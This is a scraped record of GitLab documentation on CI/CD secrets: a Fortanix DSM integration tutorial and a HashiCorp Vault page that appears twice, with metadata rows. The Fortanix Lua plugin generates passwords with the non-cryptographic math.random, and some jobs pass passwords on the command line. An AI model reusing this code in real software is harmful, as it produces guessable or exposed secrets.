Go to **Build > Jobs** and check the `build` job's log: - ![gitlab_build_result_3](img/gitlab_build_result_3_v16_9.png)
--- type: concepts, howto stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: 'Tutorial: Use Fortanix Data Security Manager (DSM) with GitLab' breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can use Fortanix Data Security Manager (DSM) as your secrets manager for GitLab CI/CD pipelines. This tutorial explains the steps required to generate new secrets in Fortanix DSM, or use existing secrets, and use them in GitLab CI/CD jobs. Follow the instructions carefully, to implement this integration, enhancing data security and optimizing your CI/CD pipelines. ## Before you begin Ensure that you have: - Access to a Fortanix DSM account with appropriate administrative privileges. For more information, refer to [Getting Started with Fortanix Data Security Manager](https://www.fortanix.com/start-your-free-trial). - A [GitLab account](https://gitlab.com/users/sign_up) with access to the project where you intend to set up the integration. - Knowledge about the process of saving secrets in Fortanix DSM, including generating and importing secrets. - Access to necessary permissions in Fortanix DSM and GitLab for group, application, plugin, variable, and secret management. ## Generate and import a new secret To generate a new secret in Fortanix DSM and use it with GitLab: 1. Sign in to your Fortanix DSM account. 1. In Fortanix DSM, [create a new group and an application](https://support.fortanix.com/hc/en-us/articles/360015809372-User-s-Guide-Getting-Started-with-Fortanix-Data-Security-Manager-UI). 1. Configure the [API Key as the authentication method for the application](https://support.fortanix.com/hc/en-us/articles/360033272171-User-s-Guide-Authentication). 1. Use the following code to generate a new plugin in Fortanix DSM: ```lua numericAlphabet = "0123456789" alphanumericAlphabet = numericAlphabet .. "abcdefghijklmnopqrstuvwxyz" alphanumericCapsAlphabet = alphanumericAlphabet .. "ABCDEFGHIJKLMNOPQRSTUVWXYZ" alphanumericCapsSymbolsAlphabets = alphanumericCapsAlphabet .. "!@#$&*_%=" function genPass(alphabet, len, name, import) local alphabetSize = #alphabet local password = '' for i = 1, len, 1 do local random_char = math.random(alphabetSize) password = password .. string.sub(alphabet, random_char, random_char) end local pass = Blob.from_bytes(password) if import == "yes" then local sobject = assert(Sobject.import { name = name, obj_type = "SECRET", value = pass, key_ops = {'APPMANAGEABLE', 'EXPORT'} }) return password end return password; end function run(input) if input.type == "numeric" then return genPass(numericAlphabet, input.length, input.name, input.import) end if input.type == "alphanumeric" then return genPass(alphanumericAlphabet, input.length, input.name, input.import) end if input.type == "alphanumeric_caps" then return genPass(alphanumericCapsAlphabet, input.length, input.name, input.import) end if input.type == "alphanumeric_caps_symbols" then return genPass(alphanumericCapsSymbolsAlphabets, input.length, input.name, input.import) end end ``` For more information, see the [Fortanix user's Guide: Plugin Library](https://support.fortanix.com/hc/en-us/articles/360041950371-User-s-Guide-Plugin-Library). - Set the import option to `yes` if you want to store the secret in Fortanix DSM: ```json { "type": "alphanumeric_caps", "length": 64, "name": "GitLab-Secret", "import": "yes" } ``` - Set the import option to `no` if you only want a new value generated for rotation: ```json { "type": "numeric", "length": 64, "name": "GitLab-Secret", "import": "no" } ``` 1. In GitLab, on the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables** and add these variables: - `FORTANIX_API_ENDPOINT` - `FORTANIX_API_KEY` - `FORTANIX_PLUGIN_ID` 1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration: ```yaml stages: - build build: stage: build image: ubuntu script: - apt-get update - apt install --assume-yes jq - apt install --assume-yes curl - jq --version - curl --version - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"name\":\"$CI_PIPELINE_ID\",\"import\":\"yes\", \"length\":\"48\"}" | jq --raw-output) - nsecret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/sys/v1/plugins/${FORTANIX_PLUGIN_ID} --data "{\"type\":\"alphanumeric_caps\", \"import\":\"no\", \"length\":\"48\"}" | jq --raw-output) - encodesecret=$(echo $nsecret | base64) - rotate=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/rekey --data "{\"name\":\"$CI_PIPELINE_ID\", \"value\":\"$encodesecret\"}" | jq --raw-output .kid) ``` 1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**. 1. Go to **Build > Jobs** and check the `build` job's log: ![gitlab_build_result_1](img/gitlab_build_result_1_v16_9.png) ![dsm_secrets](img/dsm_secrets_v16_9.png) ## Use an existing secret from Fortanix DSM To use a secret that already exists in Fortanix DSM with GitLab: 1. The secret must be marked as exportable in Fortanix: ![dsm_secret_import_1](img/dsm_secret_import_1_v16_9.png) 1. In GitLab, on the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables** and add these variables: - `FORTANIX_API_ENDPOINT` - `FORTANIX_API_KEY` - `FORTANIX_PLUGIN_ID` 1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration: ```yaml stages: - build build: stage: build image: ubuntu script: - apt-get update - apt install --assume-yes jq - apt install --assume-yes curl - jq --version - curl --version - secret=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME}\"}" | jq --raw-output .value) ``` 1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**. 1. Go to **Build > Jobs** and check the `build` job's log: - ![gitlab_build_result_2](img/gitlab_build_result_2_v16_9.png) ## Code Signing To set up code signing securely in your GitLab environment: 1. Sign in to your Fortanix DSM account. 1. Import `keystore_password` and `key_password` as secrets in Fortanix DSM. Ensure that they are marked as exportable. ![dsm_secret_import_2](img/dsm_secret_import_2_v16_9.png) 1. In GitLab, on the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables** and add these variables: - `FORTANIX_API_ENDPOINT` - `FORTANIX_API_KEY` - `FORTANIX_SECRET_NAME_1` (for `keystore_password`) - `FORTANIX_SECRET_NAME_2` (for `key_password`) 1. Create or edit the `.gitlab-ci.yml` configuration file in your project to use the integration: ```yaml stages: - build build: stage: build image: ubuntu script: - apt-get update -qy - apt install --assume-yes jq - apt install --assume-yes curl - apt-get install wget - apt-get install unzip - apt-get install --assume-yes openjdk-8-jre-headless openjdk-8-jdk # Install Java - keystore_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_1}\"}" | jq --raw-output .value) - key_password=$(curl --silent --request POST --header "Authorization:Basic ${FORTANIX_API_KEY}" ${FORTANIX_API_ENDPOINT}/crypto/v1/keys/export --data "{\"name\":\"${FORTANIX_SECRET_NAME_2}\"}" | jq --raw-output .value) - echo "yes" | keytool -genkeypair -alias mykey -keyalg RSA -keysize 2048 -keystore keystore.jks -storepass $keystore_password -keypass $key_password -dname "CN=test" - mkdir -p src/main/java - echo 'public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World!"); } }' > src/main/java/HelloWorld.java - javac src/main/java/HelloWorld.java - mkdir -p target - jar cfe target/HelloWorld.jar HelloWorld -C src/main/java HelloWorld.class - jarsigner -keystore keystore.jks -storepass $keystore_password -keypass $key_password -signedjar signed.jar target/HelloWorld.jar mykey ``` 1. The pipeline should run automatically after saving the `.gitlab-ci.yml` file. If not, select **Build > Pipelines > Run pipeline**. 1. Go to **Build > Jobs** and check the `build` job's log: - ![gitlab_build_result_3](img/gitlab_build_result_3_v16_9.png)
https://docs.gitlab.com/ci/secrets
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using external secrets in CI
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Secrets represent sensitive information your CI job needs to complete work. This sensitive information can be items like API tokens, database credentials, or private keys. Secrets are sourced from your secrets provider. Unlike CI/CD variables, which are always presented to a job, secrets must be explicitly required by a job. Read [GitLab CI/CD pipeline configuration reference](../yaml/_index.md#secrets) for more information about the syntax. GitLab provides support for the following secret management providers: 1. [Vault by HashiCorp](#use-vault-secrets-in-a-ci-job) 1. [Google Cloud Secret Manager](gcp_secret_manager.md) 1. [Azure Key Vault](azure_key_vault.md) GitLab has selected [Vault by HashiCorp](https://www.vaultproject.io) as the first supported provider, and [KV-V2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) as the first supported secrets engine. Use [ID tokens](../yaml/_index.md#id_tokens) to [authenticate with Vault](https://developer.hashicorp.com/vault/docs/auth/jwt#jwt-authentication). The [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial has more details about authenticating with ID tokens. You must [configure your Vault server](#configure-your-vault-server) before you can [use Vault secrets in a CI job](#use-vault-secrets-in-a-ci-job). The flow for using GitLab with HashiCorp Vault is summarized by this diagram: ![Flow between GitLab and HashiCorp](img/gitlab_vault_workflow_v13_4.png "How GitLab authenticates with HashiCorp Vault") 1. Configure your vault and secrets. 1. Generate your JWT and provide it to your CI job. 1. Runner contacts HashiCorp Vault and authenticates using the JWT. 1. HashiCorp Vault verifies the JWT. 1. HashiCorp Vault checks the bounded claims and attaches policies. 1. HashiCorp Vault returns the token. 1. Runner reads secrets from the HashiCorp Vault. {{< alert type="note" >}} Read the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial for a version of this feature. It's available to all subscription levels, supports writing secrets to and deleting secrets from Vault, and supports multiple secrets engines. {{< /alert >}} You must replace the `vault.example.com` URL in the following examples with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance. ## Vault Secrets Engines {{< history >}} - `generic` option [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab Runner 16.11. {{< /history >}} The Vault Secrets Engines supported by GitLab Runner with the [`secrets:engine:name`](../yaml/_index.md#secretsvault) keyword: | Secrets engine | `secrets:engine:name` value | Runner version | Details | |----------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------|----------------|---------| | [KV secrets engine - version 2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) | `kv-v2` | 13.4 | `kv-v2` is the default engine GitLab Runner uses when no engine type is explicitly specified. | | [KV secrets engine - version 1](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v1) | `kv-v1` or `generic` | 13.4 | Support for the `generic` keyword [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab 15.11. | | [The AWS secrets engine](https://developer.hashicorp.com/vault/docs/secrets/aws) | `generic` | 16.11 | | | [HashiCorp Vault Artifactory Secrets Plugin](https://jfrog.com/help/r/jfrog-integrations-documentation/hashicorp-vault-artifactory-secrets-plugin) | `generic` | 16.11 | This secrets backend talks to JFrog Artifactory server (5.0.0 or later) and dynamically provisions access tokens with specified scopes. | ## Configure your Vault server To configure your Vault server: 1. Ensure your Vault server is running on version 1.2.0 or later. 1. Enable the authentication method by running these commands. They provide your Vault server the [OIDC Discovery URL](https://openid.net/specs/openid-connect-discovery-1_0.html) for your GitLab instance, so Vault can fetch the public signing key and verify the JSON Web Token (JWT) when authenticating: ```shell $ vault auth enable jwt $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="gitlab.example.com" ``` 1. Configure policies on your Vault server to grant or forbid access to certain paths and operations. This example grants read access to the set of secrets required by your production environment: ```shell vault policy write myproject-production - <<EOF # Read-only permission on 'ops/data/production/*' path path "ops/data/production/*" { capabilities = [ "read" ] } EOF ``` 1. Configure roles on your Vault server, restricting roles to a project or namespace, as described in [Configure Vault server roles](#configure-vault-server-roles) on this page. 1. [Create the following CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server: - `VAULT_SERVER_URL` - The URL of your Vault server, such as `https://vault.example.com:8200`. Required. - `VAULT_AUTH_ROLE` - Optional. The role to use when attempting to authenticate. If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured. - `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted, default is `jwt`. - `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. With: - Vault, the `root` ("`/`") namespace is used when no namespace is specified. - Vault Open source, the setting is ignored. - [HashiCorp Cloud Platform (HCP)](https://www.hashicorp.com/cloud) Vault, a namespace is required. HCP Vault uses the `admin` namespace as the root namespace by default. For example, `VAULT_NAMESPACE=admin`. {{< alert type="note" >}} Support for providing these values in the user interface [is tracked in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/218677). {{< /alert >}} ## Use Vault secrets in a CI job {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} After [configuring your Vault server](#configure-your-vault-server), you can use the secrets stored in Vault by defining them with the [`vault` keyword](../yaml/_index.md#secretsvault): ```yaml job_using_vault: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: DATABASE_PASSWORD: vault: production/db/password@ops token: $VAULT_ID_TOKEN ``` In this example: - `production/db` is the path to the secret. - `password` is the field. - `ops` is the path where the secrets engine is mounted. - `production/db/password@ops` translates to a path of `ops/data/production/db`. - Authentication is with `$VAULT_ID_TOKEN`. After GitLab fetches the secret from Vault, the value is saved in a temporary file. The path to this file is stored in a CI/CD variable named `DATABASE_PASSWORD`, similar to [variables of type `file`](../variables/_index.md#use-file-type-cicd-variables). To overwrite the default behavior, set the `file` option explicitly: ```yaml secrets: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com DATABASE_PASSWORD: vault: production/db/password@ops file: false token: $VAULT_ID_TOKEN ``` In this example, the secret value is put directly in the `DATABASE_PASSWORD` variable instead of pointing to a file that holds it. ## Use a different secrets engine The `kv-v2` secrets engine is used by default. To use [a different engine](#vault-secrets-engines), add an `engine` section under `vault` in the configuration. For example, to set the secret engine and path for Artifactory: ```yaml job_using_vault: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: JFROG_TOKEN: vault: engine: name: generic path: artifactory path: production/jfrog field: access_token file: false ``` In this example, the secret value is obtained from `artifactory/production/jfrog` with a field of `access_token`. The `generic` secrets engine can be used for [`kv-v1`, AWS, Artifactory and other similar vault secret engines](#vault-secrets-engines). ## Configure Vault server roles When a CI job attempts to authenticate, it specifies a role. You can use roles to group different policies together. If authentication is successful, these policies are attached to the resulting Vault token. [Bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) are predefined values that are matched to the JWT claims. With bounded claims, you can restrict access to specific GitLab users, specific projects, or even jobs running for specific Git references. You can have as many bounded claims you need, but they must all match for authentication to be successful. Combining bounded claims with GitLab features like [user roles](../../user/permissions.md) and [protected branches](../../user/project/repository/branches/protected.md), you can tailor these rules to fit your specific use case. In this example, authentication is allowed only for jobs running for protected tags with names matching the pattern used for production releases: ```shell $ vault write auth/jwt/role/myproject-production - <<EOF { "role_type": "jwt", "policies": ["myproject-production"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims_type": "glob", "bound_claims": { "project_id": "42", "ref_protected": "true", "ref_type": "tag", "ref": "auto-deploy-*" } } EOF ``` {{< alert type="warning" >}} Always restrict your roles to a project or namespace by using one of the provided claims like `project_id` or `namespace_id`. Without these restrictions, any JWT generated by this GitLab instance may be allowed to authenticate using this role. {{< /alert >}} For a full list of ID token JWT claims, read the [How It Works](hashicorp_vault.md) section of the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial. You can also specify some attributes for the resulting Vault tokens, such as time-to-live, IP address range, and number of uses. The full list of options is available in [Vault's documentation on creating roles](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role) for the JSON web token method. ## Troubleshooting ### Self-signed certificate error: `certificate signed by unknown authority` When the Vault server is using a self-signed certificate, you see the following error in the job logs: ```plaintext ERROR: Job failed (system failure): resolving secrets: initializing Vault service: preparing authenticated client: checking Vault server health: Get https://vault.example.com:8000/v1/sys/health?drsecondarycode=299&performancestandbycode=299&sealedcode=299&standbycode=299&uninitcode=299: x509: certificate signed by unknown authority ``` You have two options to solve this error: - Add the self-signed certificate to the GitLab Runner server's CA store. If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), you have to create your own GitLab Runner image. - Use the `VAULT_CACERT` environment variable to configure GitLab Runner to trust the certificate: - If you are using systemd to manage GitLab Runner, see [how to add an environment variable for GitLab Runner](https://docs.gitlab.com/runner/configuration/init.html#setting-custom-environment-variables). - If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html): 1. [Provide a custom certificate for accessing GitLab](https://docs.gitlab.com/runner/install/kubernetes_helm_chart_configuration.html#access-gitlab-with-a-custom-certificate), and make sure to add the certificate for the Vault server instead of the certificate for GitLab. If your GitLab instance is also using a self-signed certificate, you should be able to add both in the same `Secret`. 1. Add the following lines in your `values.yaml` file: ```yaml ## Replace both the <SECRET_NAME> and the <VAULT_CERTIFICATE> ## with the actual values you used to create the secret certsSecretName: <SECRET_NAME> envVars: - name: VAULT_CACERT value: "/home/gitlab-runner/.gitlab-runner/certs/<VAULT_CERTIFICATE>" ``` If you are running vault server in development mode locally with [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit), you might also get this error. You can manually ask the system to trust the self signed certificate of Vault server. This [sample tutorial](https://iboysoft.com/tips/how-to-trust-a-certificate-on-mac.html) explains how to do this on macOS. ### `resolving secrets: secret not found: MY_SECRET` error When GitLab is unable to find the secret in the vault, you might receive this error: ```plaintext ERROR: Job failed (system failure): resolving secrets: secret not found: MY_SECRET ``` Check that the `vault` value is [correctly configured in the CI/CD job](#use-vault-secrets-in-a-ci-job). You can use the [`kv` command with the Vault CLI](https://developer.hashicorp.com/vault/docs/commands/kv) to check if the secret is retrievable to help determine the syntax for the `vault` value in your CI/CD configuration. For example, to retrieve the secret: ```shell $ vault kv get -field=password -namespace=admin -mount=ops "production/db" this-is-a-password ```
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using external secrets in CI breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Secrets represent sensitive information your CI job needs to complete work. This sensitive information can be items like API tokens, database credentials, or private keys. Secrets are sourced from your secrets provider. Unlike CI/CD variables, which are always presented to a job, secrets must be explicitly required by a job. Read [GitLab CI/CD pipeline configuration reference](../yaml/_index.md#secrets) for more information about the syntax. GitLab provides support for the following secret management providers: 1. [Vault by HashiCorp](#use-vault-secrets-in-a-ci-job) 1. [Google Cloud Secret Manager](gcp_secret_manager.md) 1. [Azure Key Vault](azure_key_vault.md) GitLab has selected [Vault by HashiCorp](https://www.vaultproject.io) as the first supported provider, and [KV-V2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) as the first supported secrets engine. Use [ID tokens](../yaml/_index.md#id_tokens) to [authenticate with Vault](https://developer.hashicorp.com/vault/docs/auth/jwt#jwt-authentication). The [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial has more details about authenticating with ID tokens. You must [configure your Vault server](#configure-your-vault-server) before you can [use Vault secrets in a CI job](#use-vault-secrets-in-a-ci-job). The flow for using GitLab with HashiCorp Vault is summarized by this diagram: ![Flow between GitLab and HashiCorp](img/gitlab_vault_workflow_v13_4.png "How GitLab authenticates with HashiCorp Vault") 1. Configure your vault and secrets. 1. Generate your JWT and provide it to your CI job. 1. Runner contacts HashiCorp Vault and authenticates using the JWT. 1. HashiCorp Vault verifies the JWT. 1. HashiCorp Vault checks the bounded claims and attaches policies. 1. HashiCorp Vault returns the token. 1. Runner reads secrets from the HashiCorp Vault. {{< alert type="note" >}} Read the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial for a version of this feature. It's available to all subscription levels, supports writing secrets to and deleting secrets from Vault, and supports multiple secrets engines. {{< /alert >}} You must replace the `vault.example.com` URL in the following examples with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance. ## Vault Secrets Engines {{< history >}} - `generic` option [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab Runner 16.11. {{< /history >}} The Vault Secrets Engines supported by GitLab Runner with the [`secrets:engine:name`](../yaml/_index.md#secretsvault) keyword: | Secrets engine | `secrets:engine:name` value | Runner version | Details | |----------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------|----------------|---------| | [KV secrets engine - version 2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) | `kv-v2` | 13.4 | `kv-v2` is the default engine GitLab Runner uses when no engine type is explicitly specified. | | [KV secrets engine - version 1](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v1) | `kv-v1` or `generic` | 13.4 | Support for the `generic` keyword [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab 15.11. | | [The AWS secrets engine](https://developer.hashicorp.com/vault/docs/secrets/aws) | `generic` | 16.11 | | | [HashiCorp Vault Artifactory Secrets Plugin](https://jfrog.com/help/r/jfrog-integrations-documentation/hashicorp-vault-artifactory-secrets-plugin) | `generic` | 16.11 | This secrets backend talks to JFrog Artifactory server (5.0.0 or later) and dynamically provisions access tokens with specified scopes. | ## Configure your Vault server To configure your Vault server: 1. Ensure your Vault server is running on version 1.2.0 or later. 1. Enable the authentication method by running these commands. They provide your Vault server the [OIDC Discovery URL](https://openid.net/specs/openid-connect-discovery-1_0.html) for your GitLab instance, so Vault can fetch the public signing key and verify the JSON Web Token (JWT) when authenticating: ```shell $ vault auth enable jwt $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="gitlab.example.com" ``` 1. Configure policies on your Vault server to grant or forbid access to certain paths and operations. This example grants read access to the set of secrets required by your production environment: ```shell vault policy write myproject-production - <<EOF # Read-only permission on 'ops/data/production/*' path path "ops/data/production/*" { capabilities = [ "read" ] } EOF ``` 1. Configure roles on your Vault server, restricting roles to a project or namespace, as described in [Configure Vault server roles](#configure-vault-server-roles) on this page. 1. [Create the following CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server: - `VAULT_SERVER_URL` - The URL of your Vault server, such as `https://vault.example.com:8200`. Required. - `VAULT_AUTH_ROLE` - Optional. The role to use when attempting to authenticate. If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured. - `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted, default is `jwt`. - `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. With: - Vault, the `root` ("`/`") namespace is used when no namespace is specified. - Vault Open source, the setting is ignored. - [HashiCorp Cloud Platform (HCP)](https://www.hashicorp.com/cloud) Vault, a namespace is required. HCP Vault uses the `admin` namespace as the root namespace by default. For example, `VAULT_NAMESPACE=admin`. {{< alert type="note" >}} Support for providing these values in the user interface [is tracked in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/218677). {{< /alert >}} ## Use Vault secrets in a CI job {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} After [configuring your Vault server](#configure-your-vault-server), you can use the secrets stored in Vault by defining them with the [`vault` keyword](../yaml/_index.md#secretsvault): ```yaml job_using_vault: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: DATABASE_PASSWORD: vault: production/db/password@ops token: $VAULT_ID_TOKEN ``` In this example: - `production/db` is the path to the secret. - `password` is the field. - `ops` is the path where the secrets engine is mounted. - `production/db/password@ops` translates to a path of `ops/data/production/db`. - Authentication is with `$VAULT_ID_TOKEN`. After GitLab fetches the secret from Vault, the value is saved in a temporary file. The path to this file is stored in a CI/CD variable named `DATABASE_PASSWORD`, similar to [variables of type `file`](../variables/_index.md#use-file-type-cicd-variables). To overwrite the default behavior, set the `file` option explicitly: ```yaml secrets: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com DATABASE_PASSWORD: vault: production/db/password@ops file: false token: $VAULT_ID_TOKEN ``` In this example, the secret value is put directly in the `DATABASE_PASSWORD` variable instead of pointing to a file that holds it. ## Use a different secrets engine The `kv-v2` secrets engine is used by default. To use [a different engine](#vault-secrets-engines), add an `engine` section under `vault` in the configuration. For example, to set the secret engine and path for Artifactory: ```yaml job_using_vault: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: JFROG_TOKEN: vault: engine: name: generic path: artifactory path: production/jfrog field: access_token file: false ``` In this example, the secret value is obtained from `artifactory/production/jfrog` with a field of `access_token`. The `generic` secrets engine can be used for [`kv-v1`, AWS, Artifactory and other similar vault secret engines](#vault-secrets-engines). ## Configure Vault server roles When a CI job attempts to authenticate, it specifies a role. You can use roles to group different policies together. If authentication is successful, these policies are attached to the resulting Vault token. [Bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) are predefined values that are matched to the JWT claims. With bounded claims, you can restrict access to specific GitLab users, specific projects, or even jobs running for specific Git references. You can have as many bounded claims you need, but they must all match for authentication to be successful. Combining bounded claims with GitLab features like [user roles](../../user/permissions.md) and [protected branches](../../user/project/repository/branches/protected.md), you can tailor these rules to fit your specific use case. In this example, authentication is allowed only for jobs running for protected tags with names matching the pattern used for production releases: ```shell $ vault write auth/jwt/role/myproject-production - <<EOF { "role_type": "jwt", "policies": ["myproject-production"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims_type": "glob", "bound_claims": { "project_id": "42", "ref_protected": "true", "ref_type": "tag", "ref": "auto-deploy-*" } } EOF ``` {{< alert type="warning" >}} Always restrict your roles to a project or namespace by using one of the provided claims like `project_id` or `namespace_id`. Without these restrictions, any JWT generated by this GitLab instance may be allowed to authenticate using this role. {{< /alert >}} For a full list of ID token JWT claims, read the [How It Works](hashicorp_vault.md) section of the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial. You can also specify some attributes for the resulting Vault tokens, such as time-to-live, IP address range, and number of uses. The full list of options is available in [Vault's documentation on creating roles](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role) for the JSON web token method. ## Troubleshooting ### Self-signed certificate error: `certificate signed by unknown authority` When the Vault server is using a self-signed certificate, you see the following error in the job logs: ```plaintext ERROR: Job failed (system failure): resolving secrets: initializing Vault service: preparing authenticated client: checking Vault server health: Get https://vault.example.com:8000/v1/sys/health?drsecondarycode=299&performancestandbycode=299&sealedcode=299&standbycode=299&uninitcode=299: x509: certificate signed by unknown authority ``` You have two options to solve this error: - Add the self-signed certificate to the GitLab Runner server's CA store. If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), you have to create your own GitLab Runner image. - Use the `VAULT_CACERT` environment variable to configure GitLab Runner to trust the certificate: - If you are using systemd to manage GitLab Runner, see [how to add an environment variable for GitLab Runner](https://docs.gitlab.com/runner/configuration/init.html#setting-custom-environment-variables). - If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html): 1. [Provide a custom certificate for accessing GitLab](https://docs.gitlab.com/runner/install/kubernetes_helm_chart_configuration.html#access-gitlab-with-a-custom-certificate), and make sure to add the certificate for the Vault server instead of the certificate for GitLab. If your GitLab instance is also using a self-signed certificate, you should be able to add both in the same `Secret`. 1. Add the following lines in your `values.yaml` file: ```yaml ## Replace both the <SECRET_NAME> and the <VAULT_CERTIFICATE> ## with the actual values you used to create the secret certsSecretName: <SECRET_NAME> envVars: - name: VAULT_CACERT value: "/home/gitlab-runner/.gitlab-runner/certs/<VAULT_CERTIFICATE>" ``` If you are running vault server in development mode locally with [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit), you might also get this error. You can manually ask the system to trust the self signed certificate of Vault server. This [sample tutorial](https://iboysoft.com/tips/how-to-trust-a-certificate-on-mac.html) explains how to do this on macOS. ### `resolving secrets: secret not found: MY_SECRET` error When GitLab is unable to find the secret in the vault, you might receive this error: ```plaintext ERROR: Job failed (system failure): resolving secrets: secret not found: MY_SECRET ``` Check that the `vault` value is [correctly configured in the CI/CD job](#use-vault-secrets-in-a-ci-job). You can use the [`kv` command with the Vault CLI](https://developer.hashicorp.com/vault/docs/commands/kv) to check if the secret is retrievable to help determine the syntax for the `vault` value in your CI/CD configuration. For example, to retrieve the secret: ```shell $ vault kv get -field=password -namespace=admin -mount=ops "production/db" this-is-a-password ```
https://docs.gitlab.com/ci/secrets/secrets_manager
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/secrets/_index.md
2025-08-13
doc/ci/secrets/secrets_manager
[ "doc", "ci", "secrets", "secrets_manager" ]
_index.md
Software Supply Chain Security
Pipeline Security
